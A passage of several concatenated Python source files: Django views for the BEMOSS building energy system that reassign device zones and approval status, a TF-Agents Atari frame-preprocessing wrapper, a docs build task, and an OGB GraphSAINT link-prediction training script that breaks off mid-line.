updated_approval_status = status_key
break
# if zone.zone_id != vav_instance.zone_id:
zone_update_send_topic = '/ui/networkagent/' + str(vav[0]) + '/' + str(vav_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
old_zone_id = vav_instance.zone_id
vav_instance.zone = zone # change field
vav_instance.nickname = vav[2]
d_info = DeviceMetadata.objects.get(device_id=vav[0])
current_approval_status = d_info.approval_status
print current_approval_status
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
vav_instance.save()
for rtu in _data['rtu']:
if rtu[1] != "Assign a New Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=rtu[1])
rtu_instance = RTU.objects.get(rtu_id=rtu[0])
updated_approval_status = rtu[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
#if zone.zone_id != rtu_instance.zone_id:
zone_update_send_topic = '/ui/networkagent/' + str(rtu[0]) + '/' + str(rtu_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
old_zone_id = rtu_instance.zone_id
rtu_instance.zone = zone # change field
rtu_instance.nickname = rtu[2]
d_info = DeviceMetadata.objects.get(device_id=rtu[0])
current_approval_status = d_info.approval_status
print current_approval_status
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
rtu_instance.save()
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def change_zones_plugloads(request):
#print "Inside change zones for plugloads"
if request.POST:
_data = request.body
_data = json.loads(_data)
for plugload in _data['data']:
if plugload[1] != "Assign a New Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=plugload[1])
pl_instance = Plugload.objects.get(plugload_id=plugload[0])
updated_approval_status = plugload[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
#if zone.zone_id != pl_instance.zone_id:
zone_update_send_topic = '/ui/networkagent/' + str(plugload[0]) + '/' + str(pl_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
old_zone_id = pl_instance.zone_id
pl_instance.zone = zone # change field
pl_instance.nickname = plugload[2]
d_info = DeviceMetadata.objects.get(device_id=plugload[0])
current_approval_status = d_info.approval_status
print current_approval_status
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
pl_instance.save()
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def change_zones_lighting_loads(request):
#print "Inside change zones for lighting loads"
if request.POST:
_data = request.body
_data = json.loads(_data)
#print _data
for lt_load in _data['data']:
if lt_load[1] != "Assign a New Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=lt_load[1])
lt_instance = Lighting.objects.get(lighting_id=lt_load[0])
updated_approval_status = lt_load[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
# if zone.zone_id != lt_instance.zone_id:
zone_update_send_topic = '/ui/networkagent/' + str(lt_load[0]) + '/' + str(lt_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
old_zone_id = lt_instance.zone_id
lt_instance.zone = zone # change field
lt_instance.nickname = lt_load[2]
d_info = DeviceMetadata.objects.get(device_id=lt_load[0])
current_approval_status = d_info.approval_status
print current_approval_status
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
lt_instance.save()
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def change_zones_lite(request):
#print "Inside change zones for bemoss lite"
if request.POST:
_data = request.body
_data = json.loads(_data)
for lite in _data['data']:
if lite[1] != "Associate with Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=lite[1])
lite_instance = NetworkStatus.objects.get(node_id=lite[0])
lite_instance.associated_zone = zone # change field
lite_instance.save()
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def bemoss_home(request):
context = RequestContext(request)
username = request.user
device_list_side_nav = get_device_list_side_navigation()
device_count ={
"devices": {
}
}
all_zones = Building_Zone.objects.all()
for zone in all_zones:
th_count = Thermostat.objects.filter(network_status='ONLINE', zone_id=zone.zone_id,
thermostat_id__approval_status='APR').count()
vav_count = VAV.objects.filter(network_status='ONLINE', zone_id=zone.zone_id,
vav_id__approval_status='APR').count()
rtu_count = RTU.objects.filter(network_status='ONLINE', zone_id=zone.zone_id,
rtu_id__approval_status='APR').count()
t_count = th_count + vav_count + rtu_count
pl_count = Plugload.objects.filter(network_status='ONLINE', zone_id=zone.zone_id,
plugload_id__approval_status='APR').count()
lt_count = Lighting.objects.filter(network_status='ONLINE', zone_id=zone.zone_id,
lighting_id__approval_status='APR').count()
device_count['devices'][zone.zone_id] = {'th': 0, 'pl': 0, 'lt': 0, }
device_count['devices'][zone.zone_id]['th'] = t_count
device_count['devices'][zone.zone_id]['pl'] = pl_count
device_count['devices'][zone.zone_id]['lt'] = lt_count
zones_p = [ob.data_dashboard() for ob in Building_Zone.objects.all().order_by('zone_nickname')]
for zone in zones_p:
z_id = zone['id']
zone['t_count'] = device_count['devices'][z_id]['th']
zone['pl_count'] = device_count['devices'][z_id]['pl']
zone['lt_count'] = device_count['devices'][z_id]['lt']
active_al = get_notifications()
context.update({'active_al':active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
context.update(device_list_side_nav)
return render_to_response(
'dashboard/dashboard.html',
{'zones_p': zones_p}, context)
@login_required(login_url='/login/')
def change_global_settings(request):
if request.POST:
_data = request.body
_data = json.loads(_data)
zone_id = _data['zone_id']
zone = Building_Zone.objects.get(zone_id=zone_id)
gsettings = GlobalSetting.objects.get(zone_id=zone)
gsettings.heat_setpoint = _data['heat_setpoint']
gsettings.cool_setpoint = _data['cool_setpoint']
gsettings.illuminance = _data['illumination']
gsettings.save()
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def zone_device_listing(request, zone_dev):
context = RequestContext(request)
username = request.user
zone_dev = zone_dev.encode('ascii', 'ignore')
zone_info = zone_dev.split("_")
zone_id = zone_info[0]
device_type = zone_info[1]
#Side navigation bar
device_list_side_nav = get_device_list_side_navigation()
context.update(device_list_side_nav)
#For the page
if device_type == 'th':
thermostats = [ob.data_as_json() for ob in
Thermostat.objects.filter(zone_id=zone_id, thermostat_id__approval_status='APR',
network_status='ONLINE')]
if len(thermostats) != 0:
zone_nickname = thermostats[0]['zone']['zone_nickname']
rtu = [ob.as_json() for ob in RTU.objects.filter(zone_id=zone_id, rtu_id__approval_status='APR',
network_status='ONLINE')]
if len(rtu) != 0:
zone_nickname = rtu[0]['zone']['zone_nickname']
vav = [ob.as_json() for ob in VAV.objects.filter(zone_id=zone_id, vav_id__approval_status='APR',
network_status='ONLINE')]
if len(vav) != 0:
zone_nickname = vav[0]['zone']['zone_nickname']
active_al = get_notifications()
context.update({'active_al':active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
context.update(device_list_side_nav)
return render_to_response(
'dashboard/thermostats.html',
{'thermostats': thermostats, 'rtu': rtu, 'vav': vav, 'zone_id': zone_id, 'zone_nickname': zone_nickname,
}, context)
elif device_type == 'lt':
lighting = [ob.data_as_json() for ob in
Lighting.objects.filter(zone_id=zone_id, lighting_id__approval_status='APR',
network_status='ONLINE')]
zone_nickname = lighting[0]['zone']['zone_nickname']
return render_to_response(
'dashboard/lighting_loads.html',
{'lighting_loads': lighting, 'zone_id': zone_id, 'zone_nickname': zone_nickname}, context)
elif device_type == 'pl':
plugloads = [ob.data_as_json() for ob in
Plugload.objects.filter(zone_id=zone_id, plugload_id__approval_status='APR',
network_status='ONLINE')]
zone_nickname = plugloads[0]['zone']['zone_nickname']
context.update(device_list_side_nav)
return render_to_response(
'dashboard/plugloads.html',
{'plugloads': plugloads, 'zone_id': zone_id, 'zone_nickname': zone_nickname}, context)
@login_required(login_url='/login/')
def zone_device_all_listing(request, zone_dev):
context = RequestContext(request)
username = request.user
zone_id = zone_dev.encode('ascii', 'ignore')
#Side navigation bar
active_al = get_notifications()
context.update({'active_al':active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
device_list_side_nav = get_device_list_side_navigation()
context.update(device_list_side_nav)
#For the page
thermostats = [ob.data_as_json() for ob in
Thermostat.objects.filter(zone_id=zone_id, thermostat_id__approval_status='APR')]
if len(thermostats) != 0:
zone_nickname = thermostats[0]['zone']['zone_nickname']
rtu = [ob.as_json() for ob in RTU.objects.filter(zone_id=zone_id, rtu_id__approval_status='APR')]
if len(rtu) != 0:
zone_nickname = rtu[0]['zone']['zone_nickname']
vav = [ob.as_json() for ob in VAV.objects.filter(zone_id=zone_id, vav_id__approval_status='APR',
network_status='ONLINE')]
if len(vav) != 0:
zone_nickname = vav[0]['zone']['zone_nickname']
lighting = [ob.data_as_json() for ob in Lighting.objects.filter(zone_id=zone_id, lighting_id__approval_status='APR',
network_status='ONLINE')]
if len(lighting) != 0:
zone_nickname = lighting[0]['zone']['zone_nickname']
plugloads = [ob.data_as_json() for ob in
Plugload.objects.filter( network_status='ONLINE',zone_id=zone_id, plugload_id__approval_status='APR')]
if len(plugloads) != 0:
zone_nickname = plugloads[0]['zone']['zone_nickname']
return render_to_response(
'dashboard/zone_devices_all.html',
{'thermostats': thermostats, 'vav': vav, 'rtu': rtu, 'lighting_loads': lighting,
'plugloads': plugloads, 'zone_id': zone_id, 'zone_nickname': zone_nickname,
}, context)
#@login_required(login_url='/login/')
def change_approval_status(device_id, app_status_updated):
d_info = DeviceMetadata.objects.get(device_id=device_id)
current_approval_status = d_info.approval_status
print current_approval_status
updated_approval_status = app_status_updated
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
return True
@login_required(login_url='/login/')
def modify_thermostats(request):
print "Inside modify hvac controllers"
if request.POST:
_data = request.body
_data = json.loads(_data)
for thermostat in _data['thermostats']:
zone = Building_Zone.objects.get(zone_nickname__iexact=thermostat[2])
th_instance = Thermostat.objects.get(thermostat_id=thermostat[0])
updated_approval_status = thermostat[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
#if zone.zone_id != th_instance.zone_id:
zone_update_send_topic = '/ui/networkagent/' + str(thermostat[0]) + '/' + str(th_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
th_instance.zone = zone # change field
th_instance.nickname = thermostat[1]
th_instance.save()
change_approval_status(thermostat[0], thermostat[3])
for vav in _data['vav']:
zone = Building_Zone.objects.get(zone_nickname__iexact=vav[2])
vav_instance = VAV.objects.get(vav_id=vav[0])
updated_approval_status = vav[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(vav[0]) + '/' + str(vav_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
vav_instance.zone = zone # change field
vav_instance.nickname = vav[1]
vav_instance.save()
change_approval_status(vav[0], vav[3])
for rtu in _data['rtu']:
zone = Building_Zone.objects.get(zone_nickname__iexact=rtu[2])
rtu_instance = RTU.objects.get(rtu_id=rtu[0])
updated_approval_status = rtu[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(rtu[0]) + '/' + str(rtu_instance.zone_id) + '/' + str(zone.zone_id) + '/change/' + updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
rtu_instance.zone = zone # change field
rtu_instance.nickname = rtu[1]
rtu_instance.save()
change_approval_status(rtu[0], rtu[3])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def modify_plugloads(request):
#print "Inside modify plugloads"
if request.POST:
_data = request.body
_data = json.loads(_data)
for plugload in _data:
zone = Building_Zone.objects.get(zone_nickname__iexact=plugload[2])
pl_instance = Plugload.objects.get(plugload_id=plugload[0])
updated_approval_status = plugload[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(plugload[0]) + '/' + str(pl_instance.zone_id) + '/' + str(zone.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
pl_instance.zone = zone # change field
pl_instance.nickname = plugload[1]
pl_instance.save()
change_approval_status(plugload[0], plugload[3])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def modify_lighting_loads(request):
#print "Inside modify lighting loads"
if request.POST:
_data = request.body
_data = json.loads(_data)
for lt_load in _data:
zone = Building_Zone.objects.get(zone_nickname__iexact=lt_load[2])
lt_instance = Lighting.objects.get(lighting_id=lt_load[0])
updated_approval_status = lt_load[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(lt_load[0]) + '/' + str(lt_instance.zone_id) + '/' + str(zone.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
lt_instance.zone = zone # change field
lt_instance.nickname = lt_load[1]
lt_instance.save()
change_approval_status(lt_load[0], lt_load[3])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def modify_nbd_thermostats(request):
print "Inside modify nbd hvac controllers"
if request.POST:
_data = request.body
_data = json.loads(_data)
# 0 -> device_id
# 1 -> nickname
# 2 -> approval status
for thermostat in _data['thermostats']:
th_instance = Thermostat.objects.get(thermostat_id=thermostat[0])
updated_approval_status = thermostat[2]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(thermostat[0]) + '/' + str(th_instance.zone_id) + '/' + str(th_instance.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
th_instance.nickname = thermostat[1]
th_instance.save()
change_approval_status(thermostat[0], thermostat[2])
for vav in _data['vav']:
vav_instance = VAV.objects.get(vav_id=vav[0])
updated_approval_status = vav[2]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(vav[0]) + '/' + str(vav_instance.zone_id) + '/' + str(vav_instance.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
vav_instance.nickname = vav[1]
vav_instance.save()
change_approval_status(vav[0], vav[2])
for rtu in _data['rtu']:
rtu_instance = RTU.objects.get(rtu_id=rtu[0])
updated_approval_status = rtu[2]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(rtu[0]) + '/' + str(rtu_instance.zone_id) + '/' + str(rtu_instance.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
rtu_instance.nickname = rtu[1]
rtu_instance.save()
change_approval_status(rtu[0], rtu[2])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def modify_nbd_plugloads(request):
#print "Inside modify nbd plugloads"
if request.POST:
_data = request.body
_data = json.loads(_data)
for plugload in _data:
pl_instance = Plugload.objects.get(plugload_id=plugload[0])
updated_approval_status = plugload[2]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(plugload[0]) + '/' + str(pl_instance.zone_id) + '/' + str(pl_instance.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
pl_instance.nickname = plugload[1]
pl_instance.save()
change_approval_status(plugload[0], plugload[2])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def modify_nbd_lighting_loads(request):
#print "Inside modify lighting loads"
if request.POST:
_data = request.body
_data = json.loads(_data)
for lt_load in _data:
lt_instance = Lighting.objects.get(lighting_id=lt_load[0])
updated_approval_status = lt_load[2]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(lt_load[0]) + '/' + str(lt_instance.zone_id) + '/' + str(lt_instance.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
lt_instance.nickname = lt_load[1]
lt_instance.save()
change_approval_status(lt_load[0], lt_load[2])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A class implementing minimal Atari 2600 preprocessing.
Adapted from Dopamine.
https://github.com/google/dopamine/blob/master/dopamine/discrete_domains/atari_lib.py
This includes:
. Emitting a terminal signal when losing a life (optional).
. Frame skipping and color pooling.
. Resizing the image before it is provided to the agent.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gin
from gym import core as gym_core
from gym.spaces import box
import numpy as np
import cv2
@gin.configurable
class AtariPreprocessing(gym_core.Wrapper):
"""A class implementing image preprocessing for Atari 2600 agents.
Specifically, this provides the following subset from the JAIR paper
(Bellemare et al., 2013) and Nature DQN paper (Mnih et al., 2015):
* Frame skipping (defaults to 4).
* Terminal signal when a life is lost (off by default).
* Grayscale and max-pooling of the last two frames.
* Downsample the screen to a square image (defaults to 84x84).
More generally, this class follows the preprocessing guidelines set down in
Machado et al. (2018), "Revisiting the Arcade Learning Environment:
Evaluation Protocols and Open Problems for General Agents".
"""
def __init__(self,
env,
frame_skip=4,
terminal_on_life_loss=False,
screen_size=84):
"""Constructor for an Atari 2600 preprocessor.
Args:
env: Gym environment whose observations are preprocessed.
frame_skip: int, the frequency at which the agent experiences the game.
terminal_on_life_loss: bool, If True, the step() method returns
is_terminal=True whenever a life is lost. See Mnih et al. 2015.
screen_size: int, size of a resized Atari 2600 frame.
Raises:
ValueError: if frame_skip or screen_size are not strictly positive.
"""
super(AtariPreprocessing, self).__init__(env)
# Return the observation space adjusted to match the shape of the processed
# observations.
self.observation_space = box.Box(
low=0,
high=255,
shape=(screen_size, screen_size, 1),
dtype=np.uint8)
if frame_skip <= 0:
raise ValueError(
'Frame skip should be strictly positive, got {}'.format(frame_skip))
if screen_size <= 0:
raise ValueError('Target screen size should be strictly positive, got {}'
.format(screen_size))
self.terminal_on_life_loss = terminal_on_life_loss
self.frame_skip = frame_skip
self.screen_size = screen_size
obs_dims = self.env.observation_space
# Stores temporary observations used for pooling over two successive
# frames.
self.screen_buffer = [
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8),
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8)
]
self.game_over = False
self.lives = 0 # Will need to be set by reset().
def reset(self):
"""Resets the environment.
Returns:
observation: numpy array, the initial observation emitted by the
environment.
"""
self.env.reset()
self.lives = self.env.ale.lives()
self.game_over = False
self._fetch_grayscale_observation(self.screen_buffer[0])
self.screen_buffer[1].fill(0)
return self._pool_and_resize()
def step(self, action):
"""Applies the given action in the environment.
Remarks:
* If a terminal state (from life loss or episode end) is reached, this may
execute fewer than self.frame_skip steps in the environment.
* Furthermore, in this case the returned observation may not contain valid
image data and should be ignored.
Args:
action: The action to be executed.
Returns:
observation: numpy array, the observation following the action.
reward: float, the reward following the action.
is_terminal: bool, whether the environment has reached a terminal state.
This is true when a life is lost and terminal_on_life_loss, or when the
episode is over.
info: Gym API's info data structure.
"""
accumulated_reward = 0.
for time_step in range(self.frame_skip):
# We bypass the Gym observation altogether and directly fetch the
# grayscale image from the ALE. This is a little faster.
_, reward, game_over, info = self.env.step(action)
accumulated_reward += reward
if self.terminal_on_life_loss:
new_lives = self.env.ale.lives()
is_terminal = game_over or new_lives < self.lives
self.lives = new_lives
else:
is_terminal = game_over
if is_terminal:
break
# We max-pool over the last two frames, in grayscale.
elif time_step >= self.frame_skip - 2:
# When frame_skip==1, taking a max ensures that it's still
# screen_buffer[0] that holds the fetched observation
t = time_step - max(self.frame_skip - 2, 0)
self._fetch_grayscale_observation(self.screen_buffer[t])
# Pool the last two observations.
observation = self._pool_and_resize()
self.game_over = game_over
return observation, accumulated_reward, is_terminal, info
def _fetch_grayscale_observation(self, output):
"""Returns the current observation in grayscale.
The returned observation is stored in 'output'.
Args:
output: numpy array, screen buffer to hold the returned observation.
Returns:
observation: numpy array, the current observation in grayscale.
"""
self.env.ale.getScreenGrayscale(output)
return output
def _pool_and_resize(self):
"""Transforms two frames into a Nature DQN observation.
For efficiency, the transformation is done in-place in self.screen_buffer.
Returns:
transformed_screen: numpy array, pooled, resized screen.
"""
# Pool if there are enough screens to do so.
if self.frame_skip > 1:
np.maximum(
self.screen_buffer[0],
self.screen_buffer[1],
out=self.screen_buffer[0])
transformed_image = cv2.resize(
self.screen_buffer[0], (self.screen_size, self.screen_size),
interpolation=cv2.INTER_AREA)
int_image = np.asarray(transformed_image, dtype=np.uint8)
return np.expand_dims(int_image, axis=2)
|
"""
Generate docs based on rst.
"""
from navio_tasks.cli_commands import (
check_command_exists,
config_pythonpath,
execute_with_environment,
)
from navio_tasks.settings import VENV_SHELL
from navio_tasks.utils import inform
def do_docs() -> str:
"""
Generate docs based on rst.
"""
check_command_exists("make")
my_env = config_pythonpath()
command = f"{VENV_SHELL} make html".strip().replace(" ", " ")
inform(command)
execute_with_environment(command, env=my_env)
return "Docs generated"
|
import argparse
import torch
import numpy as np
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torch_sparse import SparseTensor
from torch_geometric.data import GraphSAINTRandomWalkSampler
from torch_geometric.nn import GCNConv
from torch_geometric.utils import to_undirected, degree
from ogb.linkproppred import PygLinkPropPredDataset, Evaluator
from logger import Logger
class GCN(torch.nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, num_layers,
dropout):
super(GCN, self).__init__()
self.convs = torch.nn.ModuleList()
self.convs.append(
GCNConv(in_channels, hidden_channels, normalize=False))
for _ in range(num_layers - 2):
self.convs.append(
GCNConv(hidden_channels, hidden_channels, normalize=False))
self.convs.append(
GCNConv(hidden_channels, out_channels, normalize=False))
self.dropout = dropout
def reset_parameters(self):
for conv in self.convs:
conv.reset_parameters()
def forward(self, x, edge_index, edge_weight=None):
for conv in self.convs[:-1]:
x = conv(x, edge_index, edge_weight)
x = F.relu(x)
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.convs[-1](x, edge_index, edge_weight)
return x
class GCNInference(torch.nn.Module):
def __init__(self, weights):
super(GCNInference, self).__init__()
self.weights = weights
def forward(self, x, adj):
for i, (weight, bias) in enumerate(self.weights):
x = adj @ x @ weight + bias
x = np.clip(x, 0, None) if i < len(self.weights) - 1 else x
return x
class LinkPredictor(torch.nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, num_layers,
dropout):
super(LinkPredictor, self).__init__()
self.lins = torch.nn.ModuleList()
self.lins.append(torch.nn.Linear(in_channels, hidden_channels))
for _ in range(num_layers - 2):
self.lins.append(torch.nn.Linear(hidden_channels, hidden_channels))
self.lins.append(torch.nn.Linear(hidden_channels, out_channels))
self.dropout = dropout
def reset_parameters(self):
for lin in self.lins:
lin.reset_parameters()
def forward(self, x_i, x_j):
x = x_i * x_j
for lin in self.lins[:-1]:
x = lin(x)
x = F.relu(x)
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.lins[-1](x)
return torch.sigmoid(x)
def train(model, predictor, loader, optimizer, device):
model.train()
total_loss = total_examples = 0
for data in loader:
data = data.to(device)
optimizer.zero_grad()
h = model(data.x, data.edge_index, data.edge_norm * data.edge_attr)
src, dst = data.edge_index
pos_out = predictor(h[src], h[dst])
pos_loss = -torch.log(pos_out + 1e-15).mean()
# Just do some trivial random sampling.
dst_neg = torch.randint(0, data.x.size(0), src.size(),
dtype=torch.long, device=device)
neg_out = predictor(h[src], h[dst_neg])
neg_loss = -torch.log(1 - neg_out + 1e-15).mean()
loss = pos_loss + neg_loss
loss.backward()
optimizer.step()
num_examples = src.size(0)
total_loss += loss.item() * num_examples
total_examples += num_examples
return total_loss / total_examples
@torch.no_grad()
def test(model, predictor, data, split_edge, evaluator, batch_size, device):
predictor.eval()
print('Evaluating full-batch GNN on CPU...')
weights = [(conv.weight.cpu().detach().numpy(),
conv.bias.cpu().detach().numpy()) for conv in model.convs]
model = GCNInference(weights)
x = data.x.numpy()
adj = SparseTensor(row=data.edge_index[0], col=data.edge_index[1],
value=data.edge_attr)
adj = adj.to_scipy(layout='csr')
h = torch.from_numpy(model(x, adj)).to(device)
def test_split(split):
source = split_edge[split]['source_node'].to(device)
target = split_edge[split]['target_node'].to(device)
target_neg = split_edge[split]['target_node_neg'].to(device)
pos_preds = []
for perm in DataLoader(range(source.size(0)), batch_size):
src, dst = source[perm], target[perm]
pos_preds += [predictor(h[src], h[dst]).squeeze().cpu()]
pos_pred = torch.cat(pos_preds, dim=0)
neg_preds = []
source = source.view(-1, 1).repeat(1, 1000).view(-1)
target_neg = target_neg.view(-1)
for perm in DataLoader(range(source.size(0)), batch_size):
src, dst_neg = source[perm], target_neg[perm]
neg_preds += [predictor(h[src], h[dst_neg]).squeeze().cpu()]
neg_pred = torch.cat(neg_preds, dim=0).view(-1, 1000)
return evaluator.eval({
'y_pred_pos': pos_pred,
'y_pred_neg': neg_pred,
})['mrr_list'].mean().item()
train_mrr = test_split('eval_train')
valid_mrr = test_split('valid')
test_mrr = test_split('test')
return train_mrr, valid_mrr, test_mrr
def main():
parser = argparse.ArgumentParser(description='OGBL-Citation (GraphSAINT)')
parser.add_argument('--device', type=int, default=0)
parser.add_argument('--log_steps', type=int, default=1)
parser.add_argument('--num_workers', type=int, default=0)
parser.add_argument('--num_layers', type=int, default=3)
parser.add_argument('--hidden_channels', type=int, default=256)
parser.add_argument('--dropout', type=float, default=0.0)
parser.add_argument('--batch_size', type=int, default=16 * 1024)
parser.add_argument('--walk_length', type=int, default=3)
parser.add_argument('--sample_coverage', type=int, default=400)
parser.add_argument('--lr', type=float, default=0.001)
parser.add_argument('--epochs', type=int, default=200)
parser.add_argument('--num_steps', type=int, default=100)
parser.add_argument('--eval_steps', type=int, default=10)
parser.add_argument('--runs', type=int, default=10)
args = parser.parse_args()
print(args)
device = f'cuda:{args.device}' if torch.cuda.is_available() else 'cpu'
device = torch.device(device)
dataset = PygLinkPropPredDataset(name='ogbl-citation')
split_edge = dataset.get_edge_split()
data = dataset[0]
data.edge_index = to_undirected(data.edge_index, data.num_nodes)
data.edge_index, data.edge_attr = GCNConv.norm(data.edge_index,
data.num_nodes)
print(data.edge_index)
print(data.edge_attr)
loader = GraphSAINTRandomWalkSampler(data, batch_size=args.batch_size,
walk_length=args.walk_length,
num_steps=args.num_steps,
sample_coverage=args.sample_coverage,
save_dir=dataset.processed_dir,
num_workers=args.num_workers)
print(loader.adj)
print(loader.edge_norm)
print(loader.edge_norm.min(), loader.edge_norm.max())
# We randomly pick some training samples that we want to evaluate on:
torch.manual_seed(12345)
idx = torch.randperm(split_edge['train']['source_node'].numel())[:86596]
split_edge['eval_train'] = {
'source_node': split_edge['train']['source_node'][idx],
'target_node': split_edge['train']['target_node'][idx],
'target_node_neg': split_edge['valid']['target_node_neg'],
}
model = GCN(data.x.size(-1), args.hidden_channels, args.hidden_channels,
args.num_layers, args.dropout).to(device)
predictor = LinkPredictor(args.hidden_channels, args.hidden_channels, 1,
args.num_layers, args.dropout).to(device)
evaluator = Evaluator(name='ogbl-citation')
logger = Logger(args.runs, args)
for run in range(args.runs):
model.reset_parameters()
predictor.reset_parameters()
optimizer = torch.optim.Adam(
list(model.parameters()) + list(predictor.parameters()),
lr=args.lr)
for epoch in range(1, 1 + args.epochs):
loss = train(model, predictor, loader, optimizer, device)
print(f'Run: {run + 1:02d}, Epoch: {epoch:02d}, Loss: {loss:.4f}')
if epoch % args.eval_steps == 0:
result = test(model, predictor, data, split_edge, evaluator,
